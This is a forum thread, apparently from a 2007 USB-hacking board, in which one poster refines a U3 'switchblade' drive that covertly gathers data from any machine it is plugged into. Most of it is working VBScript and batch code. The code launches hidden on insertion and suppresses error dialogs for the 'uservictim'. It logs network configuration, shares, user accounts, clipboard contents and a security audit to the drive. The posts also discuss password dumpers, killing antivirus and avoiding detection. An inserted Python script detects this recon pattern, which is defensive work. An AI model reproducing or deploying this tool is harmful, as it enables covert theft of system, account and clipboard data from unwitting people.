beakmyn
Posts posted by beakmyn
-
So, I'm in the process of re-writing the switchblade 'code' into vbs. It's based on GonZor's method so it uses the ###.dat files.
This is so that I can output the data into HTML format (very similar to WinAudit html)
Now here comes one question/decision. Since vbs is more powerful than a simple batch file I can either:
A. wshell.exec ("net user") which will be very fast and give me a list of users
B. Use WMI or another technique and get vastly more data
AccountType, Caption, Description, Disabled, Domain, FullName, LocalAccount, Lockout, Name, PasswordChangeable, PasswordExpires, PasswordRequired, SID, SIDType, Status
After doing some testing it appears that as expected wshell.exec is almost instantaneous whereas WMI or another method takes 20 seconds.
Which would you prefer? I suppose I could just code both and then the user could just put a 1 or 2 in the dat file and I'll run the appropriate one.
-
Seeing as batch files are wonderful things in and of themselves, this is 2007 and I want my eyecandy output. So, with or without the community's permission I'm re-writing the switchblade batch file in vbs. Why? Because vbs is much more powerful than batch files and also gives me the ability to easily manipulate text files and munge them into the html I'm looking for.
-
Oh I thought you were working on something more complicated. I'm in the process of formatting the output using the WinAudit HTML output style with tables and anchors, etc.
-
I'd like to see that HTML output. I'm working on that now myself.
-
http://www.frontiernet.net/~wardriver/U3CUSTOM.zip
That's got just the scripts and .dat files needed
Items in the FD folder need to go on the flash partition sans the FD folder
-
I made some updates to your scripts, nice job btw.
go.vbs renamed to -> autorun.vbs just because. I still got the occasional insert disk error so I've added to skip a: b: and error handling that just keeps chugging if it hits a problem, better than crashing and posting a dialog to the uservictim. I've included only what's different, otherwise I'm over the max characters for message:
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objShell = CreateObject("Wscript.Shell")
Set colDrives = objFSO.Drives
On Error Resume Next
strDate = Year(now()) & Right("0" & Month(now()), 2) & Right("0" & Day(now()), 2)
strTime = Right("0" & Hour(now()), 2) & Right("0" & Minute(now()), 2) & Right("0" & Second(now()), 2)
For Each objDrive in colDrives
    'ignore floppy drives - reserved by BIOS if they don't exist
    If UCase(objDrive.DriveLetter) <> "A" And UCase(objDrive.DriveLetter) <> "B" Then
        If objFSO.FileExists(objDrive.DriveLetter & ":SystemSRCdrv.dat") Then
            strfd = objDrive.Driveletter & ":"
        End If
        If objFSO.FileExists(objDrive.DriveLetter & ":SystemSRCgo.bat") Then
            strU3 = objDrive.Driveletter & ":"
        End If
    End if
Next
If objFSO.FileExists(strfd & "SystemSRCPL.dat") Then
    objShell.Run strU3 & "SystemSRCgo.bat " & strfd & "," & strU3 & "," & strDate & "," & strTime, 0, False
End If
If objFSO.FileExists(strfd & "SystemSRCU3.dat") Then
    objShell.Run ".LaunchU3.exe -a"
End If
go.bat
I've added nircmd to grab the clipboard contents and winaudit (google it)
:: Props: Setzer1411, Marc, rpk5000
:: fd = flash partition (writable)
:: U3 = cdrom partition (readonly)
@ECHO off
If %computername%.==. SET computername=computer
If %username%.==. SET username=None
SET fd=%1System
SET U3=%2SystemSRC
CD %U3% >NUL
:: SET LOG PATHS
IF NOT EXIST %fd%Logs%computername% (
    MD %fd%Logs%computername%
)
SET logdir=%fd%Logs%computername%
SET log="%fd%Logs%computername%%computername%-[%3-%4].log"
SET tmplog="%fd%Logs%computername%%computername%_TEMP.log"
SET include="%fd%SRCInclude
SET /p eipurl=<"%1SystemSRCIncludeEIP.dat"
SET /p winaud=<"%1SystemSRCIncludewinaud.dat"
:: PAYLOAD
ECHO ----------------------------------------------------------------------------------------------------------------------------- > %log% 2>&1
ECHO GonZors mod by Beakmyn Payload [Time Started: %date% %time%] >> %log% 2>&1
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO Computer Name is: %computername% and the Logged on User Is: %username% >> %log% 2>&1
IF EXIST %include%0.dat" (
    ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
    ECHO +----------------------------------+ >> %log% 2>&1
    ECHO + [System info] + >> %log% 2>&1
    ECHO +----------------------------------+ >> %log% 2>&1
    IPCONFIG /all >> %log% 2>&1
    Echo +-----------------------------------+ >> %log% 2>&1
    Echo + Shares + >> %log% 2>&1
    Echo +-----------------------------------+ >> %log% 2>&1
    net share >> %log% 2>&1
    Echo +-----------------------------------+ >> %log% 2>&1
    Echo + Users + >> %log% 2>&1
    Echo +-----------------------------------+ >> %log% 2>&1
    net user >> %log% 2>&1
)
IF EXIST %include%19.dat" (
    ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
    Echo +-----------------------------------+ >> %log% 2>&1
    Echo + Clipboard + >> %log% 2>&1
    Echo +-----------------------------------+ >> %log% 2>&1
    .nircmd.exe clipboard addfile %log%
)
IF EXIST %include%20.dat" (
    ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
    Echo +-----------------------------------+ >> %log% 2>&1
    Echo + Win Audit + >> %log% 2>&1
    Echo +-----------------------------------+ >> %log% 2>&1
    ECHO WinAudit saved to %logdir% >> %log% 2>&1
    .WinAudit.exe %winaud% /f=%logdir%WA_%computername%[%3-%4] /f=%logdir%WA_%computername%[%3-%4].txt >> %log% 2>&1
    ECHO. >> %log% 2>&1
)
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO GonZors mod by Beakmyn Payload [Time Finished: %date% %time%] >> %log% 2>&1
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
:End
EXIT
winaud.dat rtfm for winaudit to see what the switches do
/r=oxutn /o=PDF /m=CA Security Scan
Also for the EIP I use
You could use regular expressions to remove the extra HTML
<html><head><title>Current IP Check</title></head><body>Current IP Address:127.0.0.1</body></html>
but it gets the job done and uses a public server
Take a look at nircmd if you haven't already; it does a lot of nice things with the registry and such. Could automate things more smoothly. It'll also allow you to beep the speaker at frequency and length. 3 quick 2600hz tones at the end of the script could tell you when to pull out. ;)
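How the collection sequence in the post above (a script host started from the drive, then `IPCONFIG /all`, `net share` and `net user`) looks from the detection side, as an added example that is not part of the original post or of the switchblade scripts. The events, pids, paths and drive letters are constructed, and `find_removable_recon` and the premise that removable drive letters are known from volume inventory are assumptions.

```python
import re
from collections import defaultdict

# Constructed process-creation events (fields modelled on common EDR/Sysmon
# telemetry); every pid, path, drive letter and timestamp is made up.
EVENTS = [
    {"ts": 0, "pid": 100, "ppid": 1, "image": "wscript.exe", "cmd": r'wscript.exe "E:\autorun.vbs"'},
    {"ts": 1, "pid": 110, "ppid": 100, "image": "cmd.exe", "cmd": r'cmd /c "E:\demo\go.bat" F:,E:,20070101,120000'},
    {"ts": 2, "pid": 111, "ppid": 110, "image": "ipconfig.exe", "cmd": "IPCONFIG /all"},
    {"ts": 2, "pid": 112, "ppid": 110, "image": "net.exe", "cmd": "net share"},
    {"ts": 3, "pid": 113, "ppid": 110, "image": "net.exe", "cmd": "net user"},
    {"ts": 50, "pid": 200, "ppid": 1, "image": "cmd.exe", "cmd": "cmd.exe"},
    {"ts": 55, "pid": 201, "ppid": 200, "image": "ipconfig.exe", "cmd": "ipconfig /all"},
]
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe"}
SCRIPT_ON_DRIVE = re.compile(r'\b([A-Z]):\\[^"\s]*\.(?:bat|cmd|vbs)\b', re.I)
RECON = {  # the three commands go.bat logs in its "System info" section
    "ipconfig_all": re.compile(r"^ipconfig(\.exe)?\s+/all\b", re.I),
    "net_share": re.compile(r"^net1?(\.exe)?\s+share\b", re.I),
    "net_user": re.compile(r"^net1?(\.exe)?\s+user\b", re.I),
}


def find_removable_recon(events, removable_letters, window=30, min_distinct=2):
    """Return script hosts started from a removable drive whose direct
    children ran >= min_distinct recon commands within `window` seconds."""
    launchers = {}
    for e in events:
        m = SCRIPT_ON_DRIVE.search(e["cmd"])
        if m and e["image"].lower() in SCRIPT_HOSTS and m.group(1).upper() in removable_letters:
            launchers[e["pid"]] = e
    hits = defaultdict(set)
    for e in events:
        parent = launchers.get(e["ppid"])
        if parent is None or not 0 <= e["ts"] - parent["ts"] <= window:
            continue
        for name, rx in RECON.items():
            if rx.search(e["cmd"].strip()):
                hits[parent["pid"]].add(name)
    return [{"pid": p, "script": launchers[p]["cmd"], "recon": sorted(n)}
            for p, n in sorted(hits.items()) if len(n) >= min_distinct]


if __name__ == "__main__":
    # Assumption: E: and F: are known to be removable/U3 volumes on this host.
    for alert in find_removable_recon(EVENTS, {"E", "F"}):
        print(alert)
```

The `>> %log%` redirection is handled by the parent `cmd.exe`, so it does not appear in the child command lines; the parent's script path and the burst of children are what the rule keys on.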
-
Found the following issues
| was being used as a piped command where I think your intention was for it to be a pipe character.
If you have a multi-card usb hub or other usb holder with no disk, the for loop will cause errors to be displayed to the user about "no disk present" abort,retry,fail
Count script sometimes returns "volume in drive d is removable" (where d is variable) this screws up the file name and you get
computername - [volume in drive d is removable].log
I'm investigating root cause.
-
In certain situations you'll notice I do use " in pairs, and ultimately they end up being used in pairs anyway. Generally if I am setting a folder path I will use a single " at the beginning but if I am setting a path to a file I will enclose it in " marks (I know that makes no sense but you will have to forgive me I have had no sleep)
SET include="G:SRCInclude
IF EXIST %include%0.dat"
When the second line is expanded it will look like this
"G:SRCInclude0.dat"
Note the " on either end. If I were to enclose each in " like so
SET include="G:SRCInclude"
IF EXIST "%include%0.dat"
When the second line is expanded it will look like this, and fail
""G:SRCInclude"0.dat"
To simplify my code I could get away without using any " for this situation but it is just a habit I have picked up.
Sorry about the rough quick explanation, if it doesn't make sense I can attempt another explanation after I've had some sleep.
I'm doing some tweaks to it now and compiling the batch files to executables, etc.
I'd love to take a look at the tweaks you've made, as well as the executable. What language?
It makes perfect sense. I just didn't realize that you could do that. I'm used to " denoting a string data type and that it has to have a closing ". Or in some cases 3 ", which is what I expected to see in your code. But that tends to muck things up so instead I'll use chr(34) or equivalent and concatenation.
I guess the batch file environment is more forgiving being an interpreted language but it makes the syntax highlighting in ExeScript goofing.
That's what I'm using to compile the batches (ExeScript). Albeit it's still just a batch file with an exe wrapper. Not a real executable, yet.
One thing I've done is changed the layout for the log file:
ECHO +-----------------------------------+ >> %log% 2>&1
ECHO | [System info] | >> %log% 2>&1
ECHO +-----------------------------------+ >> %log% 2>&1
I find the above easier on the eyes than the old ***** method
I'm also going to add in a safety file, time-date stamp, grab clipboard contents and other minor tweaks. I'll post when it's done.
The one thing I do like is that you still have launchpad functionality and the tools are on the CDROM partition rather than flash. I'm also going to verify fgdump as I've never gotten that to work and used an older pwdump instead.
-
Nice job! I'm doing some tweaks to it now and compiling the batch files to executables, etc. But one thing struck me as odd and most likely it's my relatively vacant use of batch files. You seem to use the " mark singularly.
such as:
SET U3="%%i:SRC
or
IF EXIST %include%1.dat" (
What is the reason for this? typically I've seen the use of the as an escape character and I'm used to seeing the " being used in pairs to enclose items with spaces or use literal meaning.
Just curious.
~Gozor~ Finished Payload
in USB Hacks
I'll post once it's finished and tested. Gonzor I'll PM you when I have something to test. I'm looking into alternatives to using 3rd party programs. Not that I have anything against Nir's tools but if it's something I can do using Native Windows tools then the AV/OS is none the wiser.
@HarshReality
The AV is typically killed using AVKill but some Antivirus are immune or will countermeasure
Safety.txt is one of a couple schemes to keep from scanning yourself. I've typically seen it used in the autorun script not the switchblade script.
The 2 ways I know to keep from scanning yourself:
1. checks for presence of file "X"
2. checks computername/user against list stored in file on U3
Personally I would go with 1, less of a paper trail, lest you lose your switchblade, but requires access to machine prior to using. This is of course not necessary if you remember to hold down the shift key when inserting U3 drive.